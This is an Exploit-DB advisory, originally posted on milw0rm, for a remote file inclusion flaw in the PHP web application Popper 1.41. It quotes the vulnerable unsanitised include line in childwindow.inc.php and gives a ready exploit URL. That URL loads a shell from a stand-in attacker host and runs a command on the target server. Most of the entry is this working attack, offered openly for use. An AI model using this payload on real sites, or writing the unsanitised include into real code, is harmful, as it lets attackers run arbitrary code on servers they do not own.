Popper 1.41-r2 - 'form' Remote File Inclusion

Author: SHiKaA
type: webapps
platform: php
port: 
date_added: 2006-09-11  
date_updated: 2016-09-09  
verified: 1  
codes:   
tags:   
aliases:   
screenshot_url:   
application_url: http://www.exploit-db.compopper-1.41-r2.tar.gz  

raw file: 2351.txt  
#==============================================================================================
#Popper <= v1.41 (form) Remote File Inclusion Exploit
#===============================================================================================
#
#Critical Level : Dangerous
#
#Venedor site : http://popper.ractive.ch/
#
#Version : v1.41
#
#================================================================================================
#Bug in : childwindow.inc.php
#
#Vlu Code :
#--------------------------------
#
#     <?php include($form.".form.inc.php");?>
#
#================================================================================================
#
#Exploit :
#--------------------------------
#
#http://sitename.com/[Script Path]/childwindow.inc.php?form=http://SHELLURL.COM?&cmd=id
#
#================================================================================================
#Discoverd By : SHiKaA
#
#Conatact : SHiKaA-[at]hotmail.com
#
#GreetZ : CCtream - Cyper-worrier team
# Special Thx To : Str0ke & simoo
==================================================================================================

# milw0rm.com [2006-09-12]